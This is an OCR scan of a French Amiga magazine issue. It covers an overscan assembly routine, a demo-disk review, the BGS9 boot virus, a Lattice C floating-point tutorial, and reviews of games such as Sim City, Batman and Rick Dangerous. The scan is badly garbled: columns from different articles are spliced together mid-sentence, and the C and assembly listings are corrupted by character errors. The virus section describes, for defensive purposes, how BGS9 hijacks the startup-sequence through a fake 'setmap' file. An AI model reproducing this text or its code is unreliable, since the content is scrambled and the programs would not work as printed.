MaxDis- playRow + 1 move.worig_maxy,dO add.w I,dO move. WdO,
1346(a0) move.l ExecBase.aô jsr Pcrmit(aô) move.l IntuiBase.aô
jsr RcmakeDisplay(aô) rts Et voila le tour est joué. Tiens au
fait je tient à signaler que cela permet également de récupérer
le bug de la rom qui fait ouvrir l’écran en NTSC. Même dans ce
cas, votre écran doit être PAL cl sévère overscan. On dit merci
qui ?
Roméo Rapido Eh, Oui. Après mon retour fulgurant dans la précédent numéro sous les acclamations de mon poisson rouge, me revoilà en force avec un superbe démodisk écrit, publié et diffusé par Thomas Landspurg:'The DreamPack".
Cette disquette contient les différentes démos au'il a faites sur Amiga.
Elles sont plus ou moins connues sauf une, inédite la "Poï-Poï démo". Ce superbe bijou n’est en fait qu'une autre vu-mètre demo, mais combien originale...Les Poï-Poî (N’oubliez pas le tréma sur le "i” sinon je vais me faire enguJer par Thomas...) sont des petits PacMans avec des gants rouges et des chaussures vertes. (Non! J'arrête tout de suile si j'entends parler de Smiley, les Poï-Poï n’ont absolument aucun rapport avec ce style de musique où les seuls instruments nécessaires à leurs élaborations sont des casseroles, une chasse d’eau et un chanteur plus ou moins castré). Les vu- mètres de
cette démo sont des sortes de pistons sur lesquels les Poï-Poï sont assis. Le vu-mètre monte, s'arrête et le Poï-Poï entraîné par l'accélération s’envole en exécutant un tour sur lui-même et retombe sur le vu-mètre.
En fond, est affiché un ciel bleu, légèrement nuageux. En bas de l'écran, un orchestre de Poï-Poïs (composé d'un bassiste, d'un batteur, de 2 synthétistes) joue la version Art of Noise d'un des Thèmes des, Blues Brothers. Cette démo, ainsi que les autres sont accessibles du Workbench (inclus dans la disquette).
La "Vectorballs demo v1.2" était aussi, à l'époque où elle fut diffusée, très originale. Elle se compose d’objets constitués de boules de tailles et de couleurs différentes qui tournent suivant les' 3 axes. Il est possible de modifier tous les mouvements des obiects au moyen des touches du curseur, des touches de fonctions, etc... Il est aussi possible de modifier les objets existants ou de créer les siens. Une documentation est incluse dans la démo. La musique qui joue en fond est de Fred. Une chose amusante: le mot ¦vectorballs' est devenu une sorte de label pour désigner les démos uti
lisant des boules.
"Don’t Panlclü" (On reconnait le fan de la quadrilogie des Hitchhikers) est une démo écrite pour le groupe ThreaL Elle est composée d'objects en vectoriel plein. On peut voir et contrôler les rotations, zooms etc., de vu- mètres, d'un ballon dirigeable, d'un Amiga, de vaisseaux spatiaux...(l'appui sur la touche Help permet de voir les instructions nécessaires). Au bas de l’écran on peut voir un superbe sigle ainsi que quatre vu-mètres en fausse 3d (l'effet est rendu par des ombres...). C'est encore une musique de Fred qu'a utilisée le programmeur.
"Vectors, agaïn?" Est une autre démo vectorielle. Une fois de plus, le programmeur a évité de tomber dans la banalité (bien qu'il reprenne un peu trop souvent le thème de la 3D). Après une page de présentation qui annonce le titre et le nom de l'auteur de la démo, un sigle Batman apparaît et se déplace avec un effet de rémanance (à voir!)dans l'espace intersidéral (symbolisé par des étoiles). Les étoilés suivent le mouvement du sigle, ce qui donne un bel effet. Puis, un ciel dégradé du bleu cyan vers le blanc apparaît ainsi qu'une étendue blanche représentant le sol. Divers objets tels qu un
vaisseau spatial, un scroll en rond à la manière Wild Copper qui effectue des rotations sur les 3 axes, etc... évoluent dans cet univers. Puis le sol se transforme en un plan d'eau et un bateau apparaît et navigue dessus. Toute la partie immergée du bateau ondule et ces ondulations varient selon la profondeur d’immersion et la perspective. Et c'est au tour d'un sous-marin (qui plonge), du vaisseau du jeu "virus"... L'ambiance est complétée par une superbe musique de Tar assez aérienne.
Une petite simulation de F1 baptisée "In Run" complète le disk. Le but est, comme d'habitude, de contrôler une voiture (vue ae derrière) sur une route sans percuter les panneaux, les poteaux, etc... ainsi que de battre le record de vitesse au tour.
Constitué par des démos qui sont devenus depuis des références, ce démo-disk est superbe. De plus pour les débutants en assembleur, Thomas a inclus la source d'un programme de vectoriel sous K-Seka et Devpack 2.
Il se peut que dans un prochain A-News il vous fasse un petit article assembleur sans empiéter, bien sûr, sur les plates-bandes de nos spécialistes des listings à moitié buggués...(Euh, excusez-moi, je délire...) Vous pouvez toujours me contacter au 47-97-84-76 (Emcric) pour vous procurer les démos testées ou écrire à Emeric Fermas, Alain Bourgery, 11, rue du pressoir ou 6, rue de la ronde couture, 75020 PARIS 08000 CHARLEVILLE-MEZIERES Joindre le port retour ainsi que les disquettes nécessaires aux copies.
(Ed: une lettre avec 1 disquette 3 "5 dépasse les 20g et coûte
3. 70F) Virus BGS9 (Suite de la page 16) "setmap" de 2608 octets
dans le sous directory ":c" écrasant par la même occasion
l’ancien fichier du même nom.
Lors du prochain appel de la "startup- sequence" c'est d'abord la commande "setmap f" qui sera exécutée et donc c’est le virus qui sera d’abord lancé puis celui-ci fera appel au fichier dans le sous directory ":devs" pour exécuter correctement la commande.
Le BGS9 contamine des disquettes NON protégées en écriture.(Comme d’ailleurs TOUS les autres virus). 11 n'est pas détecté par VirusX 3.2. Le BGS9 est "mortel" pour disque dur. Surtout pour les utilisateurs qui "Boot" automati quement ce périphérique à chaque reset!
Je vous propose quand même un moyen de le détecter en mémoire en employant la propre routine d'auto-reconnaissance du BGS9 en mémoire que j'ai pu désasscmblcr.Et également un moyen éfficacepour ceux qui possèdent un disque- dur (et les autres) pour se protéger du BGS9 et de 1TRQ-TEAM (et supprimer en mémoire TOUS les autres virus...) Il suffit de placer mon programme "Virus Detector Cleaner V13" comme PREMIER éxécutable de la startup- sequence. Le fichier VDC s’il est infecté sera éxécuté APRES l'éxécution du virus.
Et donc le VDC détectera qu'il y a quelque chose d'anormal et éffectuera un RESET spécial (Warm reset) pour réinitialiser l'ordinateur et donc éliminer le virus de la mémoire. D s'en suivra une lutte sans fin (boucle) entre le BGS9 et le VDC. Pour rétablir l'ordre il suffira de remplacer le faux fichier VDC de 2608 octets par un nouveau fichier VDC... Pour ceux qui ne programment pas en assembleur le fichier VDC se trouve sur la disquette FRANCE N'4 distribuée par HERMES DIFFUSION.(Le Master Vims Killer V1.4). En conclusion j’aimerais remercier Mr Thonney Michel (Suisse) de m'avoir
aimablement envoyé un exemplaire du BGS9 virus. Pour m’en envoyer d’autres vous pouvez toujours me contacter: Leclercq Xavier. 12 Vieux Chemin d'ath, 7502 Warchin, BELGIQUE.
Bonne programmation!
Xavier Ed: Xavier nous a envoyé le listing en assembleur de son VDC, mais nous ne le publions pas, faute de place.
Cependent, nous allons proposer à François qu'il l'install en téléchargement sur son serveur minitel 36-15 DEEP.
F&k &_ . • y» % i Les Calculs en Flottants Par contre, le linker doit utiliser la librairie mathématique. Les trois librairies à utiliser sont donc, dans l’ordre, lcm.lib, Ic.lib et amiga.lib. C’est bien gentil tout ça mais vous * UTILISATION DE FLOTTANTS AVEC DES FONCTIONS MATHEMATIQUES * include "math.h" lloat x = PI; * Flottant contenant la valeur de PI * char *pi = "3.141593"; * Chaîne représentant la valeur de PI * void mainO ( lloat y = x 180; * Pl 180 = 1’ * printf("PI = %| n".x); * Affichage de PI * prinlf("pi vaut %IW'.alof(pi)); * Conversion de la chaîne en flottant
atof = Ascii TO Float * * Fonctions mathématiques * printf("Puissance 16A3 printf("Racine carrée de 16 printf("Exponentiellc de 1 = %8.31 n",pow(16.0,3.0)); = %l n",sqn(16.0)); = %l n",exp(1.0)); printf("Logarithme Népérien de 1 = %f',log(l.oj); * Fonctions trigonomélriques * printf("Cosinus de 45' printf( Sinus de 45' printf("Tangenle de 45' prinlf("ArcCosinus de 0.5 printf("ArcSinus de 0.5 prinif("ArcTangcntc de 1 * Fonctions hyperboliques * = %f n",cos(45 * y)); = %f n",sin(45 * y)); = %l n",tan(45 * y)); = %f RadianVi",acos(0.5)); = %( Radian n",asin(0.5)); = %f
Radian n",atan(1.0)); pnntf("Cosinus hyperbolique de 1 = %f n",cosh(1.0)); prinlf("Sinus hyperbolique de 1 = %l n",sinh(l .0)); prinif("Tangcnte hyperbolique de 1 = %f n",tanh(1.0)); OpcnLi- (Note de Ed: Pas de nouvelles de Hatchman. Tous ce qu’il nous en reste est ce vieux "PROGRAMME DU MOIS" que nous partageons solonellement avec vous, le larme à l’oeil..) Ce mois-ci, la brochette de programmes du mois n’est pas pour les cancres. Mathématiques et calculs en flottants, vais vous dresser, moi!
(Ed: Très drôle! Maintenant c’est lui qui se fait dresser, cl comment! Sniff, sob) Plaisanterie mise à part, le calcul en flottant n' est pas quelque chose de trivial. Votre microprocesseur 680X0 ne sait pas faire les additions, multiplications, etc sur ces valeurs. Il faut donc utiliser tout un ensemble de routines étudiées pour. Comme promis dans le Coin C qui traitait des types de base (A-News n °I5), nous allons voir comment les mettre en oeuvre.
Nous parlerons de deux types de flottants, les flottants "ordinaires" et les flottants FFP (Fast Floating Point). Les flottants ordinaires permettent de couvrir un intervalle de valeurs allant de + - 10E-37 à + -10E+38 (1 bit de signe, 8 bits d’exposant et 23 bits pour la mantisse). Le traitement des flottants FFP est nettement plus rapide mais, en contrepartie, il y a quelques inconvénients: ils sont moins faciles à mettre en oeuvre et couvrent un domaine plus réduit: de + - 10E-20 à + - 10E+19 (soit 1 bit de signe, 7 bits d’exposant et 24 bits pour la mantisse).
Enfin, les flottants ordinaires gèrent certaines erreurs (comme la division par zéro) alors que les flottants FFP vous renverront à vos chères éludes (avec le gourou N'5).
Le programme qui suit ne fait que des opérations simples. Le compilateur dispose ici de ses propres routines d'opérations arithmétiques. Comme vous le constatez, il n’y a pas de librairie à ouvrir.
Floatx = 3.14159; void main() ( printf("PI = %f %f %f n", x, x+x, x*x); Avant tout, je précise que ces programmes sont écrits pour le compilateur Lattice. Pour ceux qui ont le Manx, le principe de base est le même, mais les noms des librairies peuvent changer.
(Reportez-vous à votre notice) Le calcul en flottant : exemple simple Comment mettre en oeuvre ces flottants FFP?
Ici, ce n'est pas le compilatcur qui dispose des librairies, c’est Commodore qui les fournit. La librairie malhffp.library, qui se trouve en ROM, contient les fonctions de base:
- conversion entier - flottant FFP
- conversion flottant FFP - entier
- comparaison de deux flouants FFP
- comparaison à 0
- valeur absolue
- calcul de l’opposé
- addition, soustraction de deux valeurs
- multiplication, division de deux valeurs Vous pouvez tester ces
opérations sur le premier programme d’exemple mais, pour
utiliser ces fonctions, plusieurs opérations sont nécessaires:
1) Ouvrir la librairie mathf- fp.library. Il faut pour cela la
déclarer en tête du programme par: int MathBasc; Avant la
première opération en flottant, il faut ouvrir effectivement
la librairie par: Tout cela est très simple. Cc type de flot
tant doit être utilisé dans de petits programmes, vite fait,
bien fait, sans sc casser la tête.
Mais pour des programmes où la vitesse est conditionnée par des calculs en flottants, il vaut mieux utiliser à ce momcnt-là les ' flottants FFP. Attention, ils ne sont pas compatibles avec les flottants ordinaires. Tous les fioat de votre programme doivent être soit ordinaires, soit FFP. Le gain de temps est appréciable, allant de 2,5 fois pour des opérations simples à 10 fois pour des calculs de cosinus, par exemple. Ce sont deux valeurs relevées au hasard, elles ne représentent pas forcément les gains minimaux et maximaux.
Aimeriez certainement faire des calculs plus savants, qui utilisent des fonctions mathématiques. On les appelle encore "fonctions transcendentales". Ici aussi, le compilateur vous facilite le travail en amenant ses propres routines, donc il n’y a pas de librairie à ouvrir. Ces routines se trouvent dans la lcm.lib. Par conséquent, n’oubliez pas de la signaler au linker.
MathBase brary("mathffp.library",0); if (IMalhBase) exit(); A la fin du programme, il faut refermer la librairie par: CloseLibrary(MathBase);
2) Vous devez avertir le linker qu’il travaille sur des
flottants FFP. Certaines fonctions étant différentes, il
faut linker avec la librairie lcmffp.lib au lieu de lcm.lib.
Attention, vous ne devez jamais avoir ces deux librairies en
même temps puisque les flottants ordinaires et FFP sont
incompatibles.
3) Et j’ai gardé le meilleur pour la fin, il faut aussi prévenir
le compilateur que vous utilisez des flottants FFP, afin qu’il
génère les appels aux bonnes fonctions. Ceci se fait en
ajoutant dans l’appel de Ici ou de le l'argument -f.
Voila pour le principe de base. Mais le compilateur Lattice est tout de même sympa. Puisqu’il sait que vous utilisez les flottants FFP, il génère tout seul l’ouverture de la mathffp.library lors du premier appel d’une de ces fonctions. Donc, si vous compilez avec le Lattice, vous pouvez éviter l'étape N'1.
Les fonctions transcendantales en FFP Voyons maintenant pour les fonctions transccndcntales. Elles se trouvent dans la mathtrans.library, qui n’est pas en ROM mais sur disque, dans votre répertoire libs.
Si le système ne la trouve pas, le premier appel à une de ces fonctions provoquera un plantage. C’est pourquoi il faut toujours tester le résultat de l'ouverture de la librairie. Si celle-ci a échoué, OpenLibrary renvoie 0 et il faut terminer sinon gare... L'ouverture de cette librairie se fait par: int MathTransBase; dans les déclarations et avant le premier calcul en flottant: MathTransBase = OpenLi- brary(”maihtrans.library",0); if (!MathTransBase) exit(); Et à la fin du programme: CloseLibrary(MathTransBase); N’oubliez pas aussi en début du fichier: include "librairies mathffp.h’’ qui
contient les déclarations de ces fonctions et de leurs paramètres. Vous ne serez pas étonné si je vous dis que le compilateur Lattice, dans son infinie bonté, génère tout seul comme un grand l’ouverture de cette librairie à votre place, ici aussi.
Elle se fait lors de la première opération rencontrée sur un flottant. Ne soyez donc pas surpris si, la première fois que vous lancez le programme, il commence à Achtung !
Le prix d’abonnement à A-News augmentera de 180F à 240F (pour 12 numéros) à partir du 10 janvier. Avant cette date nous accepterons des abonnements à l’ancien prix. Une chance inespérée pour ceux qui hésitaient à s’abonner. Et n’oublie , pas, nos abonnées bénéficient d’un envoi précoce... Vous trouverez un bulletin d’abonnement en dernière page.
Amiga C for Advanced Programmers Autrement dit : le C sur Amiga pour programmeurs confirmés. Ce bouquin des éditions ABACUS est en Anglais et pour cause, il nous vient tout droit des USA. Pour la référence il s'agit d’un des fameux DATA BECKER BOOKS (allemands), que traduit MIÔRO APPLICATION (La Bible de l'Amiga etc...), mais il n'est pas disponible en français actuellement. Le but de cet ouvrage de 649 pages numérotées, soit environ l'épaisseur d'un annuaire de la gironde, est de pèrmettre aux personnes ayant déjà un bon niveau en C sur d'autres machines, de passer à l'Amiga en douceur et
d’être capable, à la fin du livre, d’écrire un éditeur de texte dont les sources sont à la fin du livre. Tiens d'ailleurs il existe une disquette avec toutes les sources disponible pour environ 20S, ce qui est relativement cher par rapport au prix du livre qui est de 24,95$ .
Dès le début du livre on vous explique pourquoi, d'après l’auteur, il vaut mieux utiliser le MANX que le LATTICE (mais chacun est libre de son choix!). Ensuite il y a une description, agrémentée de quelques exemples: la manière dont fonctionne le compilateur, l'assembleur et l'éditeur de liens (linker). Il y a également une partie réservée aux variables et aux types disponibles sur le compilateur ce qui permet de savoir, entre autre que le type short est de 16 bits ce qui est loin d'être la règle générale (d'ailleurs chez LATTICE c’est 32 bits). Puis on attaque le gros morceau, la program
mation avec l'utilisation d'Intuition, exec et des autres bibliothèques. Il n'y a rien à redire, c’est clair et agrémenté de petits exemples de difficultés croissantes. Toutes les structures utilisées sont détaillées avec explication sur la fonction des divers champs et des différents flags.
Pour finir je dirais que C un bon bouquin mais qui s'adresse uniquement à ceux qui ont une bonne pratique de l'anglais et surtout qui connaissent déjà le C. Pour les autres il existe chez le même éditeur "Amiga C for beginners" qui a été traduit chez MICRO APPLICATION sous le non "Bien débuter en C et dont je vous ai déjà parlé il y a quelques mois. Pour ceux qui sont intéressés je recommande d'ecrire a Abacus gui se fera certainement un plaisir de vous expédier le catalogue complet ae ces produits et un bon de commande. Voici l'adresse : ABACUS,5370 52nd Street S Grand Rapids Ml 49512.
Tél : (616) 698-0330.
Roméo C whatyou want.
Plus rapidement, bien que dans ce cas, cela ne soit pas très visible... Vous pourrez retrouver ce programme en téléchargement sur 3615 DEEP. Et dans la bal Batchman de ce même serveur se cache la solution de vos éventuels problèmes de mise au point.
BATCHMAN s’exécuter, et vous demande ensuite d'insérer la disquette WorkBcnch (si vous n’avez pas de disque dur).
Afin que vous ne soyez point interloqué par la lurbidité de mes propos, vous pouvez essayer tout de suite un exemple: le même programme que pour les flottants ordinaires (le deuxième) compilé cl linké suivant les conditions ci-dessus. Evidemment, vous obtenez le même résultat mais beaucoup Que tous les fanas de tennis se rassurent, ce jeu qui faisait tant défaut sur Amiga vient de sortir sous le nom de Great Courts. Ce logiciel va s’imposer comme la référence en matière de simulation de tennis sur micro.
Vous allez pouvoir revivre en direct tous les grands moments des tournois du grand chelem et vos adversaires seront les 63 meilleurs joueurs mondiaux. Votre place de 64ième joueur au classement ATP pouiTa être améliorée au cours des tournois majeurs. Votre progression sera sujette à vos résultats de matchs et au niveau ou vous arriverez dans la compétition (finale, 1 2 finale, 1 4 de finale...). Pour ne pas commencer la compétition sans une certaine expérience le programme propose plusieurs modes d'entrainement pour se familiariser avec les différents coups du tennis. La majorité des coups
du tennis sera accessible avec un peu d'habitude et beaucoup d'entrainement. Sachez aussi maîtriser le service car il est souvent décisif dans le gain du point. Un service bien placé peut faire déborder l'adversaire et il suffit alors d'une montée au filet pour conclure le point.
Le programme est très bien fait en ce sens qu' il permet une précision dans le placement de la balle au moment du service.
Du pont de vue graphique les couleurs sont judicieuses et les sprites de bonne taille et bien animés de surcroit (notamment au moment du service, décidément le service me plaît bien).
Les bruitages quand à eux sont très réalistes. De plus une option de sauvegarde a été intégrée pour permettre de conserver votre classement et votre position dans les tournois. Sachez aussi que si l’ordinateur se révèle être un excellent adversaire le jeu à deux est possible. Great Courts est le soft qui manquait sur Amiga. A voir en priorité.
Kéké Rozen à prendre en main la conception et la gestion d’une ville, Sim City débarque sur vos écrans.
Après avoir déballé vos plans d'urbanisation et enfilé votre écharpe de maire vous allez devoir présider aux destinées d'un groupe de Sims qui vont coloniser, sous vos directives, un territoire désert et hostile.
Au départ il n'y a rien si ce n'est une somme d'argent allant de 5000$ à 20000$ suivant le niveau. Première nécessité le besoin d’autonomie au niveau énergétique. Deux solutions s'of- frent à vous: la centrale nucléaire et la centrale pétrolière, Elles ont chacune leurs avantages et leurs inconvénients. Votre premier choix s'impose. Produire de l’énergie avec une centrale puissante mais dangereuse et chère ou produire de l’énergie à coût plus faible tout en polluant l’atmosphère (bonjour la couche d'ozone). Après cela il faudra construire des zones résidentielles pour loger vos
administrés, des zones commerciales pour les leur permettre de survivre et des zones industrielles pour leur donner un travail.
L'évolution de ces trois zones devra être menée conjointement pour éviter des problèmes d'habitation, de chômage ou de migration. Si votre ville prend trop d'ampleur il vous faudra construire un stade pour contenter le peuple.
Après les industriels vous réclameront un'port ou un aéroport pour donner de l'essor à l'industrie.
Tous les ans un panneau s’affiche pouf permettre de réajuster votre budget II faudra tenir un budget très serré entre les revenus et les dépenses. Vos revenus sont alimentés par la taxe foncière dont vous fixerez le pourcentage.
Les dépenses, mises à part la construction et l'extension de la cité, seront en grande partie absorbées par les pompiers les policiers et l’entretien des routes et voies ferrées. Si vous les négligez trop les feux feront beaucoup de dégâts, le taux de criminalité sera important, les routes et les vois ferrées se dégraderont rapidement. Voilà ce qui vous attend si vous vous plongez dans ce soft.
L’ergonomie du jeu est excellente car les principales actions sont représentées par des icônes et le déplacement de la partie visible du terrain est très simple. Mis à part l'écran principal du jeu, deux autres écrans vous renseigneront sur l'évolution de la partie. L’un est un écran avec le plan de la cité et renseigne sur les facteurs déterminants pour vos choix futurs (endroit où la criminalité est importante, où le trafic est trop dense ou alors endroit trop pollué....). Le deuxième écran donne des graphes d'évolution et de développment de la population, de l'industrie, du commerce ou
alors de la criminalité sur 10 ou 120 ans. Vous pourrez ainsi juger de l'efficacité de votre politique sur ces différents plans. Vous pourrez aussi savoir ce que la population pense de vous et quels sont les principaux problèmes qui les préoccupent.
Une autre option du jeu vous permet de prendre en main des cités déjà construites mais soumises à des problèmes sous formes de catastrophes naturelles ou sous forme de problèmes sociaux. Il sera possible de reprendre la destinée de la ville de San Francisco après le tremblement de terre de 1906 ou celle de la ville de Boston après un accident nucléaire en 2010.
Sept scénarios différents vous sont proposés dans sept villes différentes et chacun à ses propres particularités donc sa propre difficulté.
Prenez garde car si vous commencez une partie vous pourrez difficilement vous arrêter et vous allez passer des nuits blanches aux commandes de votre ville. Une option de sauvegarde est toutefois prévue pur vous permettre de vous reposer. Merci à Maxis et Infogrames pour ce grand soft de stratégie simulation.
Kéké Rozen bat mari Après une rentrée où nous avons été envahi par la batmania venue d'outre-atlantique, OCEAN épuise le filon avec la sortie d'un batsoft Le scénario reprend les grands moments du film. Vous vous retrouvez dans la peau de Bruce Wayne et vous allez devoir surmonter cinq épreuves pour venir à bout du Joker, éternel ennemi de Batman. La première épreuve se déroule dans une usine chimique et se révélé être un excellent jeu de tableaux. L'usage du batarang et de la batcorde sera indispensable pour trouver la sortie et combattre Jack Napier. Essayez d’éviter les nuages toxiques et
les gouttes d'acides qui vont vite décimer votre capital vie et regardez où vous mettez les pieds. Si vous triomphez Napier tombera dans un fût de déchets toxiques qui vont le transformer.
Le Joker vient de naître. La deuxième épreuve vous mettra aux commandes de la batmobile. Une poursuite folle s'engage dans les rues encombrées de Gotham City. Une course contre le temps commence et vous devrez suivre un itinéraire indiqué par le radar de bord de la batmobile afin d'éviter les barrages de police qui ne sait pas encore si vous êtes vraiment de son coté. Pour ne pas perdre de temps dans les virages à angles droits, il faudra lancer le grappin sur un lampadaire au coin de la rue et cela au moment opportun. Si vous ratez le premier virage vous aurez deux autres chances avant de
tomber sur un barrage de police. La vitesse est très importante pour passer ce niveau car en cas de vitesse trop lente le Joker rattrapera et endommagera votre batmobile. La troisième épreuve sera moins trépidante mais tout aussi rapide. Vous êtes dans la batcave et grâce à vos ordinateurs il va falloir déterminer une formule composée de plusieurs éléments. C'est un genre de ma.stermind mais sa réussite n'est pas conditionné par un nombre défini d’essais mais par un compte à rebours. Une fois le composé découvert vous prenez en main les commandes de la batwing. Vous allez devoir couper les
cordes RICK DANGEROUS Waouh, je viens juste de terminer le premier niveau de RICK DANGEROUS, le dernier jeu de FIREBIRD. Enfin un jeu qui décoiffe. Les amateurs de jeux de plates-formes ne vont pas être déCus car c’est le premier jeu de ce genre qui tiennent la route sur votre machine préférée.
Vous êtes un aventurier dont l’avion s’écrase au milieu de la forêt amazonienne en 1945. Vous vous retrouvez à l’entrée d’un temple et dès les premières secondes l’action commence. Un énorme rocher se met à rouler et vous devez réagir très vite pour |H.GH IPH113 |Stog îïi-Tvn ¦ ‘ fcEMlt de ballons, remplis de gaz mortel, avec les ailes. Si vous loupez les cordes ou si vous touchez les ballons ils éclateront en lâchant les gaz. Il faudra de plus éviter les hélicoptères du Joker qui sont là pour faire échouer la mission. En cas de succès la dernière épreuve vous amènera dans la cathédrale de
Gotham City ou un combat final aura lieu avec le Joker. Pour cela il faudra atteindre le toit de l’édifice après avoir évité les planchers qui s’effondrent et les rats enragés. Ce dernier jeu se présente de la même façon que le premier, à savoir un jeu de plates formes avec les mêmes accessoires (batarang et batcorde).
La première et la dernière phase du jeu sont très bien réalisées mais les phases de 3D du deuxième et quatrième niveau justifient à elles seules l'achat de ce logiciel. L'impression de 3D est trè3 bien rendue et la vitesse est impressionnante. Une excellente conversion qu’OCEAN a réalisé avec ce soft.
BatKéké Rozen ne pas vous faire écraser. Sachez que les pièges vont se succéder les uns aux autres sans vous laisser la moindre seconde de répit. H vous faudra éviter les trappes dont le fond est tapissé de pieux acérés, les flèches qui jaillissent des gueules des statues qui ornent les murs et surtout des arborigônes avec qui le moindre contact est fatal. Votre panoplie d’aventurier contient néanmoins un couteau, un pistolet, quelques munitions et quelques bâtons de dynamite. D vous sera possible de trouver des balles et des explosifs au cours de vote quête mais sachez économiser ceux que
vous avez au départ car les ravitaillements sont rares.
Si vous parvenez au bout du premier niveau, les émotions ne sont pas terminées car vous partez ' aussitôt pour l’égyplc ou vous devrez retouver une pierre précieuse, puis vous partirez pour un château pour délivrer des prisonniers qui vous révéleront un plan d'attaque pour détruire la ville de Londres. Votre demierc mission consistera à vous introduire dans une base militaire (petite pensée émue pour Chorizo Kid et Batchman...) pour détruire les missiles.
Chaque niveau est divisé en plusieurs étapes et si vous êtes tué vous n’êtes pas obligé de tout reprendre depuis le début, vous repartez au début la dernière étape. Ce mode de jeu vous permettra de progresser plus facilement car une fois qu'une étape est franchie, tous les pièges seront connus et ainsi à chaque nouvelle partie vous pourrez progresser dans l’aventure. On peut cependant regretter l’absence d’un système de codes qui permettrait de commencer à partir du dernier niveau atteint au lieu d'être obligé de recommencer à chaque nouvelle partie.au début.
C’est un must à ne manquer sous aucun prétexte avec des graphismes très soignés, une animation souple, un contrôle du personnage très précis et des bruitages très convaincants. Même si le jeu n’innove pas nous sommes en présence d'un cocktail très réussi. Si vous vous plongez dans ce jeu il vous sera très difficile de vous en passer, vous allez devenir accro de Rick Dangerous. Pour ma part la découverte du deuxième niveau m'attend... Kéké Rosen ?a A-News Revoilà donc Indy pour un troisième épisode qui sera paraît-il le dernier. Il s'agit de la version aventure et le système de jeu est le
même que celui qui a propulsé Lucasfilm parmi les premières sociétés éditrices de ce genre de jeux.
Quiconque s’est frotté à Zak et ses Alicn Mindbendcrs retrouvera aisément ses marques. Les autres n'auront aucun mal à se mettre dans la peau d’Indy ei pourront donc commencer lc jeu sans une longue période d’adaptation. L’itistoire commence à l'université où travaille Indy (pardon, le Docteur Jones) en 1939. Alors qu’il annonce à son ami Marcus qu'il a enfin découvert la Croix de Coronado, on lui annonce brusquement que son père a disparu alors qu’il étail sur la piste du légendaire Graal.
Vous connaissez Indy et vous avez sûrement déjà vu le film. J’arrêterai donc là le récit car c’est à vous désormais de le compléter. Mais ne vous faites pas d’illusion: le fait d’avoir vu le film ne sera pas suffiant pour franchir les obstacles que les auteurs ont parcimonieusement déposés sur votre chemin. Des innovations ont été faites depuis Zak: l'apparition de scènes de combat et la possibilité de dialoguer avec certains personnages du jeu en choisissant une réplique parmi plusieurs proposées. Il faudra soigneusement alterner ces deux phases de jeu pour obtenir le maximum de points
durant la quctc.
Nul doute que comme son illustre prédécesseur, Indiana Jones et la Dernière Croisade connaîtra un succès certain (comme tout ce à quoi touche George Lucas, d'ailleurs). D'abord parce que Zak avait laissé un vide énorme après que ses fidèles en soient venus à bout, ensuite parce qu’il faut constater que le jeu a fait des progrès.
Pas beaucoup, mais cela laisse présager de très bonnes choses pour les produits à venir (je pense à Maniac Mansion qui sera très certainement disponible quand vous lirez ces lignes). L'humour ne quitte jamais la partie et vous vous surprendrez sûrement à sourire devant certaines répliques cocasses lancées par Indy à votre attention. En revanche, les graphismes sont toujours aussi moyens et l’on peut déplorer au début une trop longue répétition de "scènes passives” (c’cst-à-dire où le joueur reste spectateur); reconnaissons tout de même que celles-ci sont indispensables car on ne doit pas
oublier les malheureux qui n'ont pas encore vu le film.
D ne faudra pas trop abuser de vos poings et songer que parfois la diplomatie leur est préférable.
La complexité du jeu est inférieure à celle de Zak (qui n’était déjà pas très difficile) mais vous pouvez néanmoins réserver une bonne dizaine d'heures sur votre agenda car les actions sont parfois longues à accomplir. Bref, je suis toujours aussi fan!
Cédric Beust PS: Scoop de dernière minute: j'ai eu mon ami George au téléphone et il m'a annoncé qu'un quatrième épisode était en préparation. Titre prévu: Indiana Jones contre Zak Mac Kracken. Mais chut! C'est un secret.
Swcyj(ps ofywiLiçofi Electronic Arts m'avait habitué à des softs super- sorties, impeccables! Ce jeu de rôle aventure est l'exception Qui confirme la règle... Il contient des données géniales mais complètement sous-exploitées!
La doc est en anglais, mais la traduction est aisée. Elle est claire, nette et précise. Que demande le peuple? Jusque-là bon travail !. Merci Free Fall Associates. Mais lorsque l'on met la disquette dans le lecteur l'illusion disparaît comme le mirage d'un lac lorsque l'on tente d'y plonger... Le graphisme est plus que médiocre, même s’il y a des sursauts d'amélioration. Cinq fenêtres composent l'ecran, quatre pour les personnages (les trois premières son! Les vôtres, la quatrième sert aux éventuelles rencontres) et une cinquième centrale où Ion voit la situation vue de haut, style ULTIMA mais
les trois personnages sont toujours distincts.
L’animation est terriblement lente ce qui est agaçant lors des longues parties. Le son est... mauvais. Les quatres voies sont utilisées mais j ai I impression d'être sur ST. De plus la mélodie est pauvre. Pourtant on sent qu’à la base il y a eu de bonnes idées.
Le système de jeux est très évolué. Il surclasse nettement la série ULTIMA. Un à bois joueurs en simultané c'est super (un au clavier et deux au bâton de joie). Surtout qu’ils sont totalement indépendants les uns des aubes. L'ordinateur remplace les joueurs absents. Lors des premières tentatives les personnages que commande l'ordinateur vous sembleront par bop indépendants mais par la suite il devient facile de les "diriger-.La magie est difficile à utiliser lors des combats vu la rapidité avec laquelle ils se déroulent. Mais si on arrive à l'utiliser elle se révèle pour le moins efficace.
Les personnages font partie de ce qui a été bâclé dans le jeu: un manque total de précision. Seule une vague description est donnée dans la doc, c’est tout. C'est ce qui m'empêche de classer ce soft dans les jeux de rôle pur. Pas une seule caractéristique ni compétence pour les définir, c’est vraiment dommage!.
Le scénario est bien imaginé sans plus. Par conbe le système interne est excellent! Le monde dans lequel les personnages évoluent se ¦souvient" de toutes leurs actions en publics - en bien ou en mal - ce qui leur permet d’acquérir une réputation ainsi que de les faire progresser. L’environnement dans lequel les personnages évoluent est classique mais complet: Moyen-Age Fantastique comprenant magie, objets magiques, armes, donjon, etc... En conclusion: Enfin un bon système de jeu de rôle. Le monde dynamique est une bès bonne idée même si cela ne vaut pas les Bio Game du genre B.A.T. (bientôt
sur Amiga). Pourquoi faut-S une fois de plus que la présentation vienne saboter le reste?
Somme toute un soft à essayer.
Fireball 38 A-News NOUVEAUTES D pleut (ou il neige) des nouveautés en ce mois de Décembre. Et quelles nouveautés ! Vous m’en direz des nouvelles.
FISH 229 Alarming Clock : Programme qui transforme votre Amiga en Réveil. Son alarme réveillerait un mort.
Draw Map : Programme de représentations de la surface de la terre : cartes plates, cartes de mercator, une du globe ou encore une orbitale.
Inclut les sources.
Empros : Vous habitez sur l’île d’Empros qui comprend plusieurs pays. Vous devez les conquérir. Il n’existe qu’un seul moyen d'y parvenir. A vous de trouver la solution.
